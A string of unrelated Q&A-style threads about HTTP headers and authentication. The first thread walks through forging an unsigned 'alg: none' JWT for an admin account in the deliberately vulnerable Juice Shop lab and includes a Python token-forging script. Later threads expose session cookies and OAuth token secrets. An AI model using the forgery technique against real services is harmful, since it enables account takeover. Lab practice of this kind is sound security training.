I recently deployed Juice Shop on Heroku and am trying to solve the challenge of forging an unsigned JWT using Burp Suite. Following the hints in the ebook, I used the Proxy tab to capture a valid JWT from the request header on the /rest/user/whoami URL and sent the request to Repeater. In Repeater, I changed the alg property in the token header to "none" and the email in the payload to "jwtn3d@juice-sh.op", base64-encoded both parts, and put a period after the header and after the payload in the token value. When I send the request, I get an HTTP 200 OK status and the jwtn3d@juice-sh.op email is reflected, but the Juice Shop challenge doesn't register as solved. When I reload the website, I'm not logged in as jwtn3d@juice-sh.op either.
Server: Cowboy
Connection: close
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
Set-Cookie: token=ewogICJ0eXAiOiAiSldUIiwKICAiYWxnIjogIm5vbmUiCn0.ewogICJzdGF0dXMiOiAic3VjY2VzcyIsCiAgImRhdGEiOiB7CiAgICAiaWQiOiAxLAogICAgInVzZXJuYW1lIjogIiIsCiAgICAiZW1haWwiOiAiand0bjNkQGp1aWNlLXNoLm9wIiwKICAgICJwYXNzd29yZCI6ICIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsCiAgICAicm9sZSI6ICJhZG1pbiIsCiAgICAiZGVsdXhlVG9rZW4iOiAiIiwKICAgICJsYXN0TG9naW5JcCI6ICIwLjAuMC4wIiwKICAgICJwcm9maWxlSW1hZ2UiOiAiYXNzZXRzL3B1YmxpYy9pbWFnZXMvdXBsb2Fkcy9kZWZhdWx0QWRtaW4ucG5nIiwKICAgICJ0b3RwU2VjcmV0IjogIiIsCiAgICAiaXNBY3RpdmUiOiB0cnVlLAogICAgImNyZWF0ZWRBdCI6ICIyMDIyLTAyLTA2IDExOjUyOjAxLjQwOSArMDA6MDAiLAogICAgInVwZGF0ZWRBdCI6ICIyMDIyLTAyLTA2IDExOjUyOjAxLjQwOSArMDA6MDAiLAogICAgImRlbGV0ZWRBdCI6IG51bGwKICB9LAogICJpYXQiOiAxNjQ0MTQ4NDcxLAogICJleHAiOiAxNjQ0MTY2NDcxCn0.; Path=/
Content-Type: application/json; charset=utf-8
Content-Length: 133
Etag: W/"85-PWOL8M3mYJv9caLvST18mm7K+2g"
Vary: Accept-Encoding
Date: Sun, 06 Feb 2022 11:57:25 GMT
Via: 1.1 vegur
{"user":{"id":1,"email":"jwtn3d#juice-sh.op","lastLoginIp":"0.0.0.0","profileImage":"assets/public/images/uploads/defaultAdmin.png"}}
I tried opening DevTools on the website and manually changing the cookie value to the forged token; when I reloaded the website, the jwtn3d@juice-sh.op email was reflected on the profile, but it still didn't solve the challenge. I've looked for tutorials everywhere, and in all of them the challenge seems to be solved as soon as the forged token is sent via Repeater, so I'm at a loss as to why it isn't working in my case.
I found an alternative to using Repeater: I used Proxy intercept instead and changed the token value to the forged token on the /rest/user/whoami requests. That did the trick; the notification pop-up for the solved challenge didn't appear, but it did show as solved on the score board.
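For anyone reproducing this, here is a minimal sketch of how such an unsigned token can be built (Python; the payload is trimmed relative to the full one in the cookie above, and whether the trailing period is required depends on the verifier):

import base64
import json

def b64url(obj):
    # Base64url-encode a JSON object and strip the padding, as JWTs require.
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

header = {"typ": "JWT", "alg": "none"}
payload = {
    "status": "success",
    "data": {"id": 1, "email": "jwtn3d@juice-sh.op", "role": "admin"},
    "iat": 1644148471,
    "exp": 1644166471,
}

# An unsigned token is header.payload. with an empty signature segment,
# hence the trailing period.
forged = b64url(header) + "." + b64url(payload) + "."
print(forged)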
I am making a POST request in Python using the requests library and getting multiple Set-Cookie headers in the response. Out of the four, only two are being sent as cookies in my subsequent request.
response = session.request("POST", url1, data=payload1, headers=headers1, verify=False, cookies=previous_response.cookies)
When I send the request as shown above, all of the Set-Cookie values from the previous response should be set as cookies, but only a few of them are.
For example:
Set-Cookie: sp_ac=AQB1uO6eg3fKauhLNID7uLdT9wuD_9Qy-FtXYhfl68sGO4YkUL2tKpY_EXlV_SKvngDccQOI5BaKSdycCA5U-7h1N5LQ7HH5wjQbGXSB6o7pcKBvhRXsBne4zHSSFsdExwBQ0m_AwVo9d8UjkfUXiGtStI8vvF-p9ZJctNSrqf14DFh1juqZpK3cV_AplvJDVGgZEnALUa6JrBQJLZLXrUnDM4aBvPT9qNc;Version=1;Domain=accounts.spotify.com;Path=/;Secure;HttpOnly
Set-Cookie: sp_dc=AQDCboRdqnDFFtXA8px3gqjA3UkFXu5ikby1DsKg6D3v3LkholwIGSZizDHnSGuFHieuTsitpr8ubYApjQRaH2asYAuQGdzJ69zuzjPU8g;Version=1;Domain=spotify.com;Path=/;Max-Age=31536000;Secure;HttpOnly;Expires=Mon, 22 Jun 2020 13:03:15 GMT
Set-Cookie: csrf_token=AQB0q1XS7kZ5saul8QVL-7NIZVqrrAeeXW5OQUzjys8SQXTLUBf9M2wNOOQeyGU2cB-assn4XKqB9vRx;Version=1;Domain=accounts.spotify.com;Path=/;Secure
Set-Cookie: sp_key=59071bcb-664c-4302-b98b-6ba15d54f605;Version=1;Domain=spotify.com;Path=/;Max-Age=31536000;Secure;Expires=Mon, 22 Jun 2020 13:03:15 GMT
These are my previous response headers. In my next request only two of them are being sent; I don't know the reason behind it or how to solve it:
Cookie: sp_dc=AQDCboRdqnDFFtXA8px3gqjA3UkFXu5ikby1DsKg6D3v3LkholwIGSZizDHnSGuFHieuTsitpr8ubYApjQRaH2asYAuQGdzJ69zuzjPU8g; sp_key=59071bcb-664c-4302-b98b-6ba15d54f605
This is the Cookie header in my new request.
Well, I figured out the answer after a lot of research: the hosts are different. So what I did was make a small modification to the POST.
Instead of this
response = session.request("POST", url1, data=payload1, headers=headers1, verify=False, cookies=previous_response.cookies)
I changed the cookies to a dict so that they would be host-independent, as follows:
response = session.request("POST", url1, data=payload1, headers=headers1, verify=False, cookies=previous_response.cookies.get_dict())
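To see why the jar behaves this way, here is a minimal sketch (the hostnames are placeholders, not the real endpoints): a RequestsCookieJar keeps each cookie's Domain attribute and only attaches the cookies that match the request host, while the plain dict from get_dict() carries no domain information, so every cookie gets sent.

import requests

jar = requests.cookies.RequestsCookieJar()
jar.set("csrf_token", "abc123", domain="accounts.spotify.com", path="/")
jar.set("sp_dc", "xyz789", domain="spotify.com", path="/")

session = requests.Session()

# Domain-scoped jar: only cookies whose Domain matches the request host are attached.
scoped = session.prepare_request(
    requests.Request("POST", "https://api.spotify.com/endpoint", cookies=jar))
print(scoped.headers.get("Cookie"))   # only sp_dc (its domain matches the host)

# Flattened dict: domain information is discarded, so every cookie is attached.
flat = session.prepare_request(
    requests.Request("POST", "https://api.spotify.com/endpoint",
                     cookies=jar.get_dict()))
print(flat.headers.get("Cookie"))     # csrf_token and sp_dc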
One of our applications is tested by Whitehat Sentinel and one of their findings was that in some cases our response header for Server is set to:
Microsoft-HTTPAPI/2.0
I have tried accessing the URL they identified with Postman and Fiddler but I do not see the Server header. I have also tried an online web sniffer http://web-sniffer.net/
Can someone advise how I can see this header?
In the Chrome Network tab I see these headers:
HTTP/1.1 404 Not Found
Content-Type: text/html
Strict-Transport-Security: max-age=300
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Date: Thu, 13 Jul 2017 13:59:15 GMT
Content-Length: 1245
No Server header.
The URL reported by Whitehat was not working for me, so I changed the target URL to domain.com/%%; this caused the request to be handled by http.sys, and it returned the Server header.
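For reference, the same check can be reproduced from a script by sending the malformed path directly, bypassing any client-side URL normalisation (a minimal Python sketch; the hostname is a placeholder):

import http.client

# /%% is an invalid percent-escape, so http.sys rejects the request itself and
# answers before the application ever sees it.
conn = http.client.HTTPSConnection("www.example.com")
conn.request("GET", "/%%")
response = conn.getresponse()
print(response.status, response.reason)   # typically 400 Bad Request
print(response.getheader("Server"))       # e.g. Microsoft-HTTPAPI/2.0
conn.close()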
That is not the name of the header. That is the value found in the Server header when an application serves files over HTTP via http.sys, which is the kernel-mode HTTP server built into Windows.
For example, when serving a file via a C# HttpListener, I get this header:
Server: Microsoft-HTTPAPI/2.0
This header can be disabled by setting the following registry value:
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters
Name: DisableServerHeader
Type: DWORD
Value: 1
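If you prefer to script the change, here is a small sketch using Python's winreg module (same key and value as above; it must run with administrative rights, and the HTTP service generally needs to be restarted before the change takes effect):

import winreg  # Windows only

# Create/update DisableServerHeader = 1 (DWORD) under the HTTP service parameters.
key = winreg.CreateKeyEx(
    winreg.HKEY_LOCAL_MACHINE,
    r"SYSTEM\CurrentControlSet\Services\HTTP\Parameters",
    0,
    winreg.KEY_SET_VALUE,
)
winreg.SetValueEx(key, "DisableServerHeader", 0, winreg.REG_DWORD, 1)
winreg.CloseKey(key)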
I am trying to connect to Intuit's v3 REST API using node.js. I am using SuperAgent and superagent-oauth to make the requests. I generated the access tokens using Intuit's OAuth Playground, but I keep getting "ApplicationAuthenticationFailed; errorCode=003200; statusCode=401".
This is what I am using.
var OAuth = require('oauth'),
    request = require('superagent');
require('superagent-oauth')(request);

var oauth = new OAuth.OAuth('', '', consumerKey, consumerSecret, '1.0A', null, 'HMAC-SHA1');

request.get("https://quickbooks.api.intuit.com/v3/company/672198300/customer/102")
  .set('Content-Type', 'text/plain')
  .accept('json')
  .sign(oauth, accessToken, accessTokenSecret)
  .end(function (err, res) {
    console.log(res.text);
  });
and here is the response
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<IntuitResponse time="2014-06-14T18:33:49.228-07:00" xmlns="http://schema.intuit.com/finance/v3">
<Fault type="AUTHENTICATION">
<Error code="3200">
<Message>message=ApplicationAuthenticationFailed; errorCode=003200; statusCode=401</Message>
</Error>
</Fault>
</IntuitResponse>
Can anyone shed any light on what is happening?
You could use the node.js client library
Like most other clients, that would save you from manually building http requests. Just provide the application credentials and the individual user credentials and you can simply call methods on a Javascript object. All of the REST endpoints have corresponding methods on the QuickBooks object, which follows node.js convention and takes an optional callback as the last argument.
Solved!
I used Postman to create the request, and it worked. Then I checked the OAuth header Postman had generated against the one I was generating with node (I used RequestBin to see the header of my request). I discovered that the only real difference was that I was using "1.0A" as the version. Changing that to "1.0" worked!
var oauth = new OAuth.OAuth('','', consumerKey, consumerSecret, '1.0', null, 'HMAC-SHA1')
I do not have anything for you in node.js, but I can provide the raw request and response for the calls. Compare your raw requests against these. The signature should be double encoded.
Get Request Token call:
GET https://oauth.intuit.com/oauth/v1/get_request_token?oauth_callback=oob&oauth_nonce=34562646-ab97-46e1-9aa7-f814d83ef9d1&oauth_consumer_key=qyprd7I5WvVgWDFnPoiBh1ejZn&oauth_signature_method=HMAC-SHA1&oauth_timestamp=1392306961&oauth_version=1.0&oauth_signature=0EtvSnzsuumeyib2fiEcnSyu8%3D HTTP/1.1
Host: oauth.intuit.com
HTTP/1.1 200 OK
Date: Thu, 13 Feb 2014 15:56:03 GMT
Server: Apache
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/plain
oauth_token_secret=dXhHHMS1EfdrQ32UabOMscIRWt5bLJNX3ZKljjBc&oauth_callback_confirmed=true&oauth_token=qyprdbwXdWrAt0xM2NgkLlJ79yCp4I2SmDg7tahDBPjA6Wti
Get Access Token call:
GET https://oauth.intuit.com/oauth/v1/get_access_token?oauth_verifier=b4skra3&oauth_token=qyprde5fvI7WNOQjTKYLDzTVxJ2dLPTgQEQSPlDVGxEy9wZX&oauth_nonce=f20a5a4b-3635-40a8-92cf-697dfdb07b9d&oauth_consumer_key=qyprd7I5WvVgJZUvWDFnPoiBh1ejZn&oauth_signature_method=HMAC-SHA1&oauth_timestamp=1392397399&oauth_version=1.0&oauth_signature=gEVHttlM8IBAAkmi1dSNJgkKGsI%3D HTTP/1.1
Host: oauth.intuit.com
HTTP/1.1 200 OK
Date: Fri, 14 Feb 2014 17:03:20 GMT
Server: Apache
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 120
Connection: close
Content-Type: text/plain
oauth_token_secret=474gtp6xsFzNJ1EhrrjiHrTH96xXieaRLinjPomA&oauth_token=qyprdNIpWn2oYPupMpeH8Byf9Bhun5rPpIZZtTbNsPyFtbT4
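If you want to cross-check the signing from another stack, here is a minimal Python sketch (assuming the requests_oauthlib package; the keys and tokens are placeholders) that makes the same kind of resource call with OAuth 1.0 and HMAC-SHA1:

import requests
from requests_oauthlib import OAuth1

auth = OAuth1(
    client_key="consumerKey",
    client_secret="consumerSecret",
    resource_owner_key="accessToken",
    resource_owner_secret="accessTokenSecret",
    signature_method="HMAC-SHA1",   # the OAuth version string must be "1.0", not "1.0A"
)

resp = requests.get(
    "https://quickbooks.api.intuit.com/v3/company/672198300/customer/102",
    auth=auth,
    headers={"Accept": "application/json"},
)
print(resp.status_code)
print(resp.text)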
When I punch in the URL for a secured database it displays the following message on the page:
{"error":"unauthorized","reason":"You are not authorized to access this db."}
Although this message certainly gets the point across, I would prefer to redirect the user to a different page, like a login page. I've tried changing the authentication_redirect option in the CouchDB config, but with no success. How would I go about doing this?
The authentication redirect only works if the client explicitly accepts the text/html content type (i.e. sends an Accept: text/html header):
GET /db HTTP/1.1
Accept: text/html
Host: localhost:5984
In this case, CouchDB will send an HTTP 302 response instead of HTTP 401, redirecting to the authentication form specified by the authentication_redirect configuration option:
HTTP/1.1 302 Moved Temporarily
Cache-Control: must-revalidate
Content-Length: 78
Content-Type: text/plain; charset=utf-8
Date: Tue, 24 Sep 2013 01:32:40 GMT
Location: http://localhost:5984/_utils/session.html?return=%2Fdb&reason=You%20are%20not%20authorized%20to%20access%20this%20db.
Server: CouchDB/1.4.0 (Erlang OTP/R16B01)
{"error":"unauthorized","reason":"You are not authorized to access this db."}
Otherwise, CouchDB cannot tell whether the request was sent by a human from a browser or by an application library. In the latter case, redirecting to an HTML form instead of raising an HTTP error isn't a suitable solution.
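A quick way to see both behaviours is to vary the Accept header (a minimal sketch, assuming a local CouchDB at localhost:5984 with a protected database named db and authentication_redirect configured):

import requests

base = "http://localhost:5984/db"

# No text/html in Accept: CouchDB answers with a plain 401 JSON error.
api_resp = requests.get(base, headers={"Accept": "application/json"})
print(api_resp.status_code, api_resp.json())

# Accept: text/html: CouchDB answers with a 302 to the authentication form.
browser_resp = requests.get(base, headers={"Accept": "text/html"},
                            allow_redirects=False)
print(browser_resp.status_code, browser_resp.headers.get("Location"))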
Problem: I can't seem to get Firefox to cache images sent from a dynamic server.
Setup: a static Apache server with a reverse proxy to a dynamic server (mod_perl2) at the backend.
Here is the request for the image. It is sent to the dynamic server, where the cookie is used to validate access to the image:
Request Headers
Host: <OBSCURED>
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: <OBSCURED>
Cookie: pz_cred=4KCNr0RM15%2FJCOt%2BEa6%2BL62z%2Fxvbp2xNQHY5pJw5d6Q
Pragma: no-cache
Cache-Control: no-cache
The dynamic server streams the image back to the server, and provides the following response:
Response Headers
Date: Tue, 24 Nov 2009 04:28:07 GMT
Server: Apache/2.2.11 (Ubuntu) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Cache-Control: public, max-age=31536000
Content-Length: 25496
Content-Type: image/jpeg
Via: 1.1 127.0.1.1:8081
Keep-Alive: timeout=15, max=75
Connection: Keep-Alive
So far, so good (methinks). However, on reload of the page, the image does not appear to be cached, and a request is sent again:
Request Headers
Host: <OBSCURED>
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: <OBSCURED>
Cookie: pz_cred=4KCNr0RM15%2FJCOt%2BEa6%2BL62z%2Fxvbp2xNQHY5pJw5d6Q
Cache-Control: max-age=0
It doesn't seem that this request should happen, as the browser should have cached the image. As it is, a 200 response is received, the same as the first, and the image appears to be re-fetched (although the browser does appear to be using the cached images).
The problem appears to be hinted at by the Cache-Control: max-age=0 in the reload request header, above.
Does anyone know why this is happening? Perhaps it is the Via header in the response that is causing the problem?
The original request has
Cache-Control: no-cache
which tells all the intermediate HTTP caches (including Firefox's) that you don't want to use a cached response, you want to get the response from the origin web server itself.
The response says:
Cache-Control: public, max-age=31536000
which tells everyone that, as far as the origin server is concerned, the response may be cached. The server seems to be configured to allow the image to be cached. HTTP 1.1 (section 14.21) says:
Note: if a response includes a Cache-Control field with the max-age directive (see section 14.9.3), that directive overrides the Expires field.
Your second request says:
Cache-Control: max-age=0
which tells all the intermediate HTTP caches that you won't take any cached response older than 0 seconds.
One thing to watch out for: if you hit the Reload button in Firefox, you are asking to reload from the origin web server. To test the caching of the image, navigate away from the page and back, or open it up in a new tab. Not sure why you saw no-cache the first time and max-age=0 the second though.
BTW, I like the Firebug plug-in for Firefox. You can take a look at the request and response headers with it, and all sorts of other good stuff.
My previous answer was only partially correct.
The problem is the way Firefox 3 handles reload events. Apparently, it almost always requests the content again from the origin server, hence the Cache-Control: max-age=0 request header.
Firefox does use cached images to render a page on reload, but it still makes all the requests to update them "in the background". It then replaces them as they come in.
Therefore, the page renders fast and YSlow reports cached content, but the server is still getting nailed.
The resolution is to interrogate the incoming headers in the dynamic server script and determine whether an 'If-Modified-Since' header is provided. If it is, and the content has not changed, an HTTP_NOT_MODIFIED (304) response is returned.
This is not optimal -- I'd rather Firefox not make the requests at all -- but it cuts the page load time in half and greatly reduces bandwidth. Given the way Firefox works on reload, this appears to be the best solution.
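For illustration, here is a minimal sketch of that conditional-response idea in Python (the site in question uses mod_perl, so this is only a standalone stand-in with a hypothetical fixed modification time):

from datetime import datetime, timezone
from email.utils import parsedate_to_datetime, format_datetime
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical fixed modification time for the image being served.
LAST_MODIFIED = datetime(2009, 11, 22, 7, 28, 25, tzinfo=timezone.utc)

class ImageHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        ims = self.headers.get("If-Modified-Since")
        if ims:
            try:
                if parsedate_to_datetime(ims) >= LAST_MODIFIED:
                    self.send_response(304)   # client copy is current, send no body
                    self.end_headers()
                    return
            except (TypeError, ValueError):
                pass   # unparsable date: fall through and send the full response
        self.send_response(200)
        self.send_header("Content-Type", "image/jpeg")
        self.send_header("Last-Modified", format_datetime(LAST_MODIFIED, usegmt=True))
        self.send_header("Cache-Control", "public, max-age=31536000")
        self.end_headers()
        # self.wfile.write(image_bytes)  # body omitted in this sketch

if __name__ == "__main__":
    HTTPServer(("localhost", 8081), ImageHandler).serve_forever()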
Other comments: Jim Ferran's point about navigating away from the page and returning has merit -- the cache is always used, and no requests are outgoing (+1 to Jim). Also, content that is dynamically added (e.g. AJAX calls after the initial load) appears to use the cache as well.
Hope this helps someone besides me :)
Looks like I solved it:
Removed the proxy Via header
Added a Last-Modified header
Added a far-future Expires date
Firebug still shows 200 responses from the origin server; however, YSlow recognizes the images as cached. According to YSlow, the total image download size when fresh is greater than 500K; with the cache primed, it shows a 0K download size.
Here are the response headers from the origin server which do the trick:
Date: Tue, 24 Nov 2009 08:54:24 GMT
Server: Apache/2.2.11 (Ubuntu) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Sun, 22 Nov 2009 07:28:25 GMT
Expires: Tue, 30 Nov 2010 19:00:25 GMT
Content-Length: 10883
Content-Type: image/jpeg
Keep-Alive: timeout=15, max=89
Connection: Keep-Alive
Because of the way I'm requesting the images, it really should not matter if these dates are static; my app knows the last-modified time before requesting the image and appends it to the request URL on the client side to create a unique URL for each image version, e.g. http://myserver.com/img/125.jpg?20091122 (the info comes from an AJAX JSON feed), as sketched below. I could, for example, make the last-modified date 01 Jan 2000 and the Expires date sometime in the year 2050.
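For illustration only, the versioning scheme boils down to something like this (the values are the ones from the example above):

# The app already knows the image's last-modified time from the AJAX JSON feed,
# so it appends that value to make a unique, indefinitely cacheable URL per version.
image_id = 125
last_modified = "20091122"   # taken from the JSON feed
url = "http://myserver.com/img/%d.jpg?%s" % (image_id, last_modified)
print(url)   # http://myserver.com/img/125.jpg?20091122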
If YSlow is correct -- and performance testing implies it is -- then Firebug should really report these local cache hits instead of a 200 response.